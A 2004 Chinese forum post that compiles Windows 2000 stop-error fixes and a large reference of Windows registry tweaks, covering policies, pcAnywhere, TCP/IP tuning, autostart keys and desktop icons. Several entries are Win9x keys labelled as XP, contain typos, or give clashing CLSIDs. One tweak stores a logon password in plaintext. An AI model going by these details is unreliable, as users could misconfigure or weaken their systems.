单处理器系统的内核文件是Ntoskml.exe，而多处理器系统的内核文件是Ntkrnlmp.exe，但是，这些文件要与安装媒体上的文件相对应；在安装完Windows2000和，不论使用的是哪个原文件，都会被重命名为Ntoskrnl.exe文件。HAL文件在安装之后也使用名称Hal.dll但是在安装媒体，但是在安装媒体上却有若干个可能的HAL文件。
12.停止错误编号：0x0000007A
说明文字：KERNEL-DATA-INPAGE-ERROR
通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。（通常是由于分页文件上的故障，病毒，磁盘控制器错误或由故障的RAM引起的）。
解决方法：使用反病毒软件的最新版本，检查计算机上是否存在病毒。如果找到病毒。则执行必要的步骤把他从计算机上清除掉，请参阅犯病度软件文档了解如何执行这些步骤。
如果计算机已使用NTFS文件系统格式化。可重新启动计算机，然后在该系统分区上运行Chkdsk /f/r命令。如果由于错误而无法启动命令，那么使用命令控制台，并运行Chkdsk /r命令。
运行由计算机制造商提供的所有的系统在很端软件，尤其是内存检查。
13.停止错误编号：0xC000021A
说明文字：STATUS-SYSTEM-PROCESS-TERMINATED
通常的原因：用户模式子系统，例如Winlogon或客户服务器运行时子系统（CSRSS）已被损坏，所以无法再保证安全性。
解决方法：卸掉所有新近安装的硬件。
如果无法登陆，则重新启动计算机。当出现可用的作系统列表时按F8。在Windows2000高级选项菜单屏幕上，选择：“最后一次正确的配置”。然后按会车。
运行故障恢复台，并允许系统修复任何检测到的错误。
14.停止错误编号：0xC0000221
说明文字：STATUS-IMAGE-CHECKISU7M-MISMATCH
通常的原因：驱动程序或系统DLL已经被损坏。
解决方法：运行故障复控台，并且允许系统修复任何检测到的错误。
如果在RAM添加到计算机之后，立即发生错误，那么可能是分页文件损坏，或者新RAM由故障或不兼容。删除Pagefile.sys并将系统返回到原来的RAM配置。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:27　　 标题: 整理了七个小时的东东！[申请加精]

二十二。★★★Windows XP系统注册表解释
WinXP并没有提供像Win98下Scanreg这样的注册表手动恢复工具，而是采取了更为主动的故障恢复技术。WinXP在每次成功启动后都主动保存配置设置。一旦系统由于某些原因不能启动时，它就会使用保存的“上次的正确”设置来启动计算机，以排除新硬件或新软件带来的问题。当然你也可以在系统启动时按F8键进入WinXP的启动菜单，自己选择“最后一次正确的配置”选项来启动机器。但有时使用这一方法依然无法进入系统，安全模式也无法进入，那就只得使用恢复控制台（Recovery Console）了。用系统安装光盘启动电脑，然后在安装程序的选单中按“R”选择修复，就能进入控制台
注册表基础：
********系统文件夹：*********
名称 路径 含义
AppData C:\Windows\Application Data 应用程序
Cache C:\Windows\Temporary Internet Files 浏览器缓存
Cookies C:\Windows\Cookies
Desktop Desktop 桌面
Favorites Favorites 收藏夹
Fonts Fonts 字体
History History 历史文件夹
NetHood NetHood 网上邻居
Personal C:\My Documents 我的文档
PrintHood PrintHood 打印机
Program Start Menu\Programs 程序
Recent Recent 文档
SendTo SendTo 发送到
Start Menu Start Menu 开始菜单
Startup Start Menu\Programs\启动 启动组
Templates Temp 临时文件夹
******当需要修改这些系统文件夹的路径时，只需进入注册表的HKEY_CURRENT_USER\Software
\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 中修改相应的路径即可。

********系统特殊的文件夹*********
**********在我们的桌面上或其他地方有一些文件夹并不是真正的文件夹，它们只是一个用来
显示窗口文件夹内容的OLE对象，如“我的计算机”、“控制面板”等等，它们都有一个系统默
认的类ID类标识，windows在注册表的HKEY_CLASSES_ROOT\CLSID下定义这些类。**********

文件夹 类ID 说明
Control Panel {21EC2020-3AEA-1069-A2DD-08002B30309D} 控制面板
Dial-Up Networking {992CFFA0-F557-101A-88EC-00DD010CCC48} 拨号网络
Internet Explorer {BFB23B42-E3F0-101B-8488-00AA003E56F8} 浏览器
My Computer {20D04FE0-3AEA-1069-A2D8-08002B30309D} 我的电脑
Network Neighborhood {208D2C60-3AEA-1069-A2D7-08002B30309D} 网上邻居
Printers {2227A280-3AEA-1069-A2DE-08002B30309D} 打印机
Recycle Bin {645FF040-5081-101B-9F08-00AA002F984E} 回收站
Scheduled Tasks {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 计划任务
My Documents {450D8FBA-AD25-11D0-98A8-0800361B1103} 我的文档
URLHistory Folder {FF393560-C2A7-11CF-BFF4-444553540000} URL历史
*************文件或其他对象的图标：*************
图标是一个文件或对象的标识。对于一个ICO文件只有一个唯一的图标， 可以用“路径\图标
文件名”来指示该文件的图标；对于EXE、DLL等文件，它们可能要包含不止一个图标，这时就
需要有一个索引标志来指明是第几个图标，可以用“路径\文件名，索引号”的形式来指示该
文件的图标。
如果要修改系统文件夹的图标，只需进入注册表的HKEY_CLASSES_ROOT\CLSID中，查找到系统
文件夹的类ID，然后修改 DefaultIcon中的图标文件路径即可；如果要修改其他文件的默认图
标则需要在HKEY_CLASSES_ROOT\CLSID\"文件类型"\DefaultIcon中修改图标文件的路径。
***************驱动器的自动运行功能************
打开CDROM的自动运行功能并且放入可以自动运行的光盘时，光盘上的程序会自动运行，那么其
他的诸入硬盘、移动盘等是否也可以自动运行哪？在注册表的HKEY_USERS\DEFAULT\Software
\Microsoft\Windows\CurrentVersion\Policies\Exploer下可以看到有一个
NoDriveTypeAutoRun的值项，其中的值就指明了可以自动运行的驱动器。该值项是一个4字节的
二进制值，第一字节的每位对应于不同的驱动器，如果对应位置为“1”则表示关闭自动运行功
能，如果对应位置为“0”则表示打开自动运行功能。下表是各位对应的驱动器类型
第0位：未知驱动器 第2位：可移动驱动器 第3位：硬盘
第4位：远程驱动器 第5位：CDROM驱动器 第6位：RAM驱动器
winxp系统注册表解释大全2（转）
**************系统****************
作 用:删除系统无用的动态链接库(DLL文件)
路 径:HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLL
键值名称:
数据类型:
键 值:每个DLL文件的键值说明此DLL被几个应用程序共享
备 注:若为"01 00 00 00"则此DLL文件被一个应用程序共享。若为 "00 00 00 00"则该DLL文件
对系统不起作用，说明它是一个垃圾文件，删除该键值，并且记下 这个 DLL文件名，从
\windows\system文件夹中将该DLL文件删除。
作 用:你的名字放入系统任务栏
路 径:HKEY_CURRENT_USER\Control Panel\International
键值名称:键值：sTimeFormat="HH:mm:-Ss tt"，s1159="CFAN"，s2359="HELLO"
数据类型:
键 值:说明：12点之前，在系统任务栏中显示CFAN，之后则显示HELLO，可任意设置以达到自己
的效果

作 用:在每次退出系统时，自动清除文档菜单中的历史记录
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer]
键值名称:"ClearRecentDocsonExit"
数据类型:十六进制
键 值:01,00,00,00

作 用:禁止"系统"中出现"设备管理器"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\System
键值名称:NoDevMgrPage
数据类型WORD
键 值:1

作 用:禁止"系统"中出现"文件系统"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\System
键值名称:NoFileSysPage
数据类型WORD
键 值:1

作 用:禁止"系统"中出现"虚拟内存"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:NoVirtMemPage
数据类型WORD
键 值:1

作 用:禁止"系统"中出现"硬件配置文件"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:NoConfigPage
数据类型WORD
键 值:1

作 用:禁止在"系统属性"中出现"设备管理器"的菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建 "NoDevMgrPage"
数据类型WORD
键 值:设其值为"1"

作 用:禁止在"系统属性"中出现"文件系统"的菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建 "NoFileSysPage"
数据类型WORD
键 值:设其值为"1"

作 用:禁止在"系统属性"中出现"虚拟内存"的菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建 "NoVirtMemPage"
数据类型WORD
键 值:设其值为"1"

作 用:禁止在"系统属性"中出现"硬件配置文件"的菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建 "NoConfigPage"
数据类型WORD
键 值:设其值为"1"

作 用:改变系统的字体
路 径:HKEY_LOCAL_MACHINE\config\0001\Display\settings
键值名称:fonts.fon
数据类型:
键 值:默认vgasys.fon

作 用:设置用软盘快速启动系统的功能
路 径:HKEY_LOCAL_MACHINE\Config\0001\Enum\Bios\*PNP0700\0B
键值名称:FloppyFastBoost
数据类型:
键 值:值为01 00 00 00即可用软盘快速启动系统

作 用:系统不能访问硬盘
路 径:HKEY_LOCAL_MACHINE\Enum\PCI
键值名称:ChannelOptions
数据类型:hex
键 值:2

作 用:查看系统分配给光驱的可用盘符
路 径:HKEY_LOCAL_MACHINE\Enum\SCSI
键值名称:找到字符串UserDriveLetterAssignment
数据类型:
键 值:其值即表示系统分配给光驱的可用盘符，如果为HZ表示从H到Z可以给光驱使用。

作 用:在系统属性里显示更多的CPU信息
路 径:HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0
键值名称:"VendorIdentifier"
数据类型:
键 值:"Genuine Intel"(注意空格)

作 用:为系统增加启动时自动加载的程序
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\Windows\CurrentVersion\Run
键值名称:新建主键，名自定
数据类型:
键 值:其值为"要执行文件的路径及文件名"

作 用:修改系统版权信息
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\DEVEOPER\SETUP
键值名称:想修改的键名
数据类型:字符串
键 值:输入修改值

作 用:查找系统的安装注册码
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
键值名称roductKey
数据类型:
键 值:值即是系统安装时必不可少的注册码。

作 用:让系统自动运行一次某个程序
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
键值名称:新建主键
数据类型:
键 值:其值为"要执行文件的路径及文件名"

作 用:Windows系统各目录位置
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
键值名称:
数据类型:
键 值:

作 用:系统可用盘符
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\setup
键值名称:lastdrive
数据类型:
键 值:z

作 用:开机时自动登录系统
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
键值名称:新建 "AutoAdminLogon" "DefaultPassword" "DefaultUserName"
数据类型:字符串
键 值:其值设为"1"， 登录时的密码 ， 登录时所用的用户名

作 用:找回windows9x启动时的网络口令提示对话框
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\Real Mode Net
键值名称:AutoLogon
数据类型:
键 值:值改为01
备 注:如果没有AutoLogon串，可以新建这个项AutoLogon，并将其值赋为01。
作 用:使拨号网络可以储存密码
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\RealModeNet
键值名称:Autologon
数据类型word
键 值:数值改为 "01 00 00 00 00"
备 注:
作 用:在拨号网络设置中禁止拨入
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network
键值名称:新建"NoDialIn"
数据类型WORD
键 值:"键值"框内输入1。
备 注:
作 用:允许网络搜寻的SAP方法
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:IPXUseNBSapMethod
数据类型:
键 值:
备 注:
作 用:网络浏览者(Network Browser)
路 径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser\Parameters
键值名称:IsDomainMaster
数据类型:
键 值:yes,是网络主浏览者(Domain Master Browser)
备 注:
作 用:慢速网络
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Net\0000\
键值名称:SLOWNET
数据类型:
键 值:1
备 注:
作 用:禁止自动登陆到网络服务
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32\NetworkProvider
键值名称isableDefaultPasswords
数据类型WORD
键 值:1
备 注:
作 用:指定优先的网络服务
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP32\NetworkProvider
键值名称:AuthenticatingAgent
数据类型:字符串值
键 值:
备 注:
作 用:支持网络服务器上的长文件名
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\NWREDIR
键值名称:SupportLFN
数据类型WORD
键 值:1
备 注:
作 用:禁止"网络"选项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network
键值名称:NoNetSetup
数据类型WORD
键 值:0x1
备 注:
作 用:禁止"整个网络"选项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network
键值名称:NoEntireNetwork
数据类型:
键 值:0x1
备 注:
作 用:删除Network Neighborhood文件夹
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer\ Network Neighborhood
键值名称:NoNetHood
数据类型:
键 值:改为 00 00 00 00
备 注:
作 用:删除Internet Explorer文件夹
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer\InternetExplorer
键值名称:NoInternetIcon
数据类型:
键 值:改为00 00 00 00
备 注:
作 用:允许TCP/IP远端指定IP地址或机器名
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Remote Control
键值名称romptForTCPIPHost
数据类型WORD
键 值:1
备 注:
作 用:TCP/IP请求间隔
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPQueryInterval
数据类型WORD
键 值:默认50秒
备 注:
作 用:TCP/IP主机绑定模式
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPHostBindMode
数据类型:
键 值:1，使用默认IP地址
备 注:
作 用:设置TCP/IP数据端口
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPDataPort
数据类型:
键 值:
备 注:
作 用:设置TCP/IP状态端口
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPStatusPort
数据类型:BINARY
键 值:默认1600(HEX)
备 注:
作 用:TCP/IP广播模式
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPNetBroadcast
数据类型WORD
键 值:
备 注:
作 用:更改最大的TCP/IP传输单元
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans
键值名称:展开表示TCP/IP协议的那个子键（可以从子健下DriveDesc的值判断，如0000），
在其下新建MaxMTU字符串
数据类型:
键 值:设其值为576
备 注:因为如果MaxMTU大于576，系统传输就需要重新分组，这样就降低了传输效率。windows
默认以太网的标准分组值，为1500
作 用:更改TCP/IP的分组寿命的值
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
键值名称efaultTTL
数据类型:
键 值:修改键值为255
备 注:这主要是防止TCP/IP分组在Internet中被无限复制。Windows 9X的缺省值为32，加大改值，
可使TCP/IP分组通过Internet传输到更远的目的地。
作 用:指定系统默认的邮件客户端软件
路 径:HKEY_CLASSES_ROOT\mailto\shell\open\command
键值名称:"默认"
数据类型:
键 值:输入Netscape或IE的全路径和%1（中间有空格）
备 注:例如"C:\Program Files\Outlook Express\ Msimn.exe" /mailurl:%1或"C:\Program Files
\Netscape\Program\Netscape.exe" %1。
作 用:检查Foxmail是否是系统默认的邮件软件
路 径:HKEY_CURRENT_USER\Software\Aerofox\Foxmail\General
键值名称:CheckMailer
数据类型:
键 值:键值改为1即可检查Foxmail是否为系统默认的邮件软件
备 注:
作 用:取消URL地址的下划线
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\main
键值名称:Ancher Underline
数据类型:
键 值:值改为no
备 注:
作 用:重新找回频道栏
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
键值名称:Show_ChannelBand
数据类型:
键 值:值改为yes
备 注:
作 用:设定"超级链接"处点击前后的颜色
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
键值名称:Anchor Color和Anchor Color Visited
数据类型:
键 值:值分别表示点击前后的颜色，用RGB值表示
备 注:
作 用:收藏夹目录
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
键值名称:Favorites
数据类型:
键 值:
备 注:
作 用:代理服务器地址
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
键值名称roxyServer
数据类型:字符串
键 值:
备 注:
作 用:主机登陆处理
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Host
键值名称:PromptIfLoggedOut
数据类型WORD
键 值:1，表示当远端主机处于Windows NT登陆状态且"rompt()=On Connection" and
"Disconnect On Timeout"都选中时用户不进行连接
备 注:
作 用:继承远端打印模式
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Remote Control
键值名称:Print
数据类型WORD
键 值:0：忽略；1：主机；2：远端；3主机与远端
备 注:
作 用:快速发送文件大小限制
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\File Transfer
键值名称:SpeedSend Minimum Size
数据类型:数值 KB
键 值:-(默认为10)
备 注:
作 用:确认远程文件发送
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\File Transfer
键值名称:ConfirmSend
数据类型WORD
键 值:1
备 注:
作 用:确认远程文件删除
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\File Transfer
键值名称:ConfirmDelete
数据类型WORD
键 值:1
备 注:
作 用:断开后等候呼叫
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Host
键值名称:OnlyOneGoodConnectiond
数据类型WORD
键 值:0
备 注:
作 用:使用远程计算机名
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Host
键值名称:ConfirmComputerName
数据类型WORD
键 值:1
备 注:
作 用:远端打印等待超时
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Remote Control
键值名称:PrinterFlushTimeout
数据类型WORD
键 值:秒数(默认为30秒)
备 注:
作 用:主机连接超时
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\Remote Control
键值名称:NonPCAHostTimeout
数据类型WORD
键 值:秒数(0为永不超时)
备 注:
作 用:Configure Multicast Send and Receive Buffers
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastHostNumRecvBuf, TCPIPMcastHostNumSendBuf, TCPIPMcastRemNumRecvBuf, TCPIPMcastRemNumSendBuf
数据类型WORD
键 值:
备 注:
作 用:Configure the Multicast Data Port
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastDataPort
数据类型:BINARY
键 值:默认0x15f
备 注:
作 用:Multicast Adapter Selection
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastInterface
数据类型WORD
键 值:
备 注:
作 用:Multicast Error Correction
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastErrorCorrect
数据类型WORD
键 值:0,禁止
备 注:
作 用:Multicast Maximum Transmission Unit
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastMTU
数据类型WORD
键 值:1400-10,239字节数
备 注:
作 用:Multicast Packet Delay
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastDataDelay
数据类型WORD
键 值:毫秒数(0=禁止)
备 注:
作 用:Multicast Winsock Receive Buffer
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPMcastWSRecvBuf
数据类型WORD
键 值:字节数,默认8000
备 注:
作 用:-PcANYWHERE第一次启动时运行Smart Setup
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:SmartSetup
数据类型WORD
键 值:1
备 注:
作 用:TAPI MODEM错误
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:UseFirstTapiModem
数据类型WORD
键 值:
备 注:

作 用:改变串接56K连接速度
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:SerialUse56000
数据类型WORD
键 值:1
备 注:
作 用:给浏览包(Browse Packets)增加附加延迟
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPBrowseDelay
数据类型:
键 值:毫秒数
备 注:
作 用:设置Winsock缓冲大小
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPWSDataBuf
数据类型WORD
键 值:1-65535字节(默认=8000)
备 注:
作 用:适配器绑定模式
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPHostAdapterMode
数据类型WORD
键 值:=0，默认网络适配器；=1，所有的网络适配器
备 注:
作 用:显示主机列表
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称isplayHostInList
数据类型WORD
键 值:1
备 注:
作 用:与底版本的端口兼容性
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPPortCompatibility
数据类型WORD
键 值:0,禁止
备 注:
作 用:允许连接未知状态的主机
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPConnectIfUnknown
数据类型WORD
键 值:1
作 用:指定主机IP地址
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcANYWHERE\CurrentVersion\System
键值名称:TCPIPHostAddressIndex
数据类型WORD
作 用:为一台机器设置两个IP地址
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans
键值名称:可以看到多个名为0000、0001、0002…的目录，它们用于记录协议的安装情况。
在它们中间找到DriverDesc为"TCP/IP"的目录，修改IPAddress和IPMask两个键
键 值:其中IPAddress为用逗号隔开的多个IP地址，IPMask是对应的掩码。
备 注:例如设置IPAddress为"202.10.1.10，202.10.1.25"，IPMask为
"255.255.255.0，255.255.255.0"时，表示为系统设置了两个IP地址202.10.1.10 和202.10.1.25。
作 用:禁止SAP advertising
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcpServer\Parameters
键值名称:Use_Sap
数据类型:字符串值
键 值:1
作 用:更改传输单元接收缓冲区的大小
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
键值名称efaultRcvWindow
键 值:修改键值为6144
备 注:如果DefaultRcvWindow太大，一个分组出错后将导致整个缓冲区的分组数据丢失
并重发，如果太小，将导致分组堵塞，降低速度，最好为512字节的4～12倍。
作 用:MTU自动探测
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\
键值名称:PMTUDiscovery
键 值:1
作 用:黑洞探测
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\
键值名称:PMTUBlackHoleDetect
数据类型:
键 值:1
作 用:域名服务器超时
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\
键值名称:NameSrvQueryTimeout
数据类型:字符串值
作 用:更改Go!Zilla下载完毕的提示声音
路 径:HKEY_CURRENT_USER\AppEvents\Schemes\App\GoZilla\Download Success\.current
键 值:改其"默认"键值为自己喜欢的.wav文件
winxp系统注册表解释大全3（转）
作 用:修改桌面的提示
路 径:HKEY_CLASSES_ROOT\CLSID\相应的ID号，如{20D04FE0-3AEA-1069-A2D8-08002B30309D}
键值名称:InfoTip
键 值:修改内容为你想要的

作 用:在桌面上不显示Win98版本号
路 径:HKEY_CURRENT_USER\Control Panel\desktop
键值名称:PaintDesktopVersion
键 值:修改为0

作 用:锁定桌面和环境变量
路 径:HKEY_CURRENT_USER\SOFTWARE\Micorosoft\Windows\CurrentVersion\Policies\Explorer
键值名称:NoSaveSettings
数据类型WORD
键 值:1
作 用:禁止桌面的提示
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
键值名称:ShowInfoTip
键 值:值由1 改为0。
作 用:关闭Active Desktop，还原为传统的桌面
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名称:NoActiveDesktop
键 值:值设为0，可以关闭这些功能；设置为1，可以激活它。
作 用:隐藏在桌面空白处右击鼠标时弹出的上下文菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名称:新建NoViewContextMenu
数据类型WORD
键 值:值设为"1"时为有效
作 用:禁用 "设置"菜单中的"活动桌面"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建"NoDispCPL"
数据类型WORD
键 值:"键值"框内输入1。
作 用:禁止编辑桌面项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
\ActiveDesktop
键值名称:NoEditingComponents
数据类型WORD
键 值:1
作 用:禁止关闭桌面项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
\ActiveDesktop
键值名称:NoClosingComponents
数据类型WORD
键 值:1
作 用:禁止删除桌面项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
\ActiveDesktop
键值名称:NoDeletingComponents
数据类型WORD
键 值:1
作 用:禁止添加桌面项
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System
\ActiveDesktop
键值名称:NoAddingComponents
数据类型WORD
键 值:1
作 用:回收站改名字
路 径:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
键值名称:"默认"
键 值:修改（默认）为你喜欢的名字。
作 用:锁定回收站
路 径:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InProcServer32
键值名称:"默认"
键 值:串值后加上"-"符号
备 注:例如原值若为`shell32.dll` 则修改为 `shell32.dll-`
作 用:扩充"回收站"的鼠标右键功能
路 径:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
键值名称:Attributes
数据类型WORD
键 值:40 01 00 20
备 注:以下是相应菜单项对应的值 01 复制 02 剪切 03 复制和剪切 10 重命名 20 删除
30 重命名和删除 40 属性 50 重命名和属性 53 复制、剪切、重命名、属性 60 删除和属性
63 删除、属性、复制、剪切 70 重命名、删除和属性 73 重命名、删除、属性、复制、剪切
作 用:找回"我的电脑"、"回收站"、"收件箱"
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop
\NameSpace
键值名称:新建主键为相应的ID号

作 用:隐藏"回收站"
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\
NameSpace
键值名称:{450d8fba-ad25-11d0-98a8-0800361b1103}
键 值:删除
作 用:我的电脑改名字
路 径:HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
键值名称:"默认"
键 值:修改右边的（默认）为你想要的名字。
作 用:锁定我的电脑
路 径:HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
键值名称:"默认"
键 值:串值后加上"-"符号
备 注:例如原值若为 `shell32.dll` 则修改为 `shell32.dll-`
作 用:双击我的电脑启动资源管理器
路 径:HKEY_CLASSES_ROOT\CLSID\{20DO4FE0-3AEA-1069-A2D8-08002B30309D}\SHELL
键值名称:建open/command/文件夹,默认建名
键 值:值为c:\windows\explorer.exe
winxp系统注册表解释大全4（转）
★★★★★★★★图标★★★★★★★★
作 用:修改普通文件类型的图标
路 径:HKEY_CLASSES_ROOT\.ext （ext为欲修改的文件的扩展名）
键值名称:查找与.ext文件相关的程序数据名（如与.bat文件相关的程序数据名为"batfile"）
键 值:打开HKEY_CLASSES_ROOT\batfile\DefaultIcon（"batfile"为上一步找出的程序数据名）
将DefaultIcon的缺省数据修改为你喜欢的图标所在的位置
备 注:要从Windows目录下删除ShellIconCache文件。此文件为图标文件缓冲，它的存在可使系统
不必在文件的初始位置加载图标，而只需从此图标缓存中加载，加快了桌面和资源管理器中显示图标的速度。
作 用:我的电脑换图标
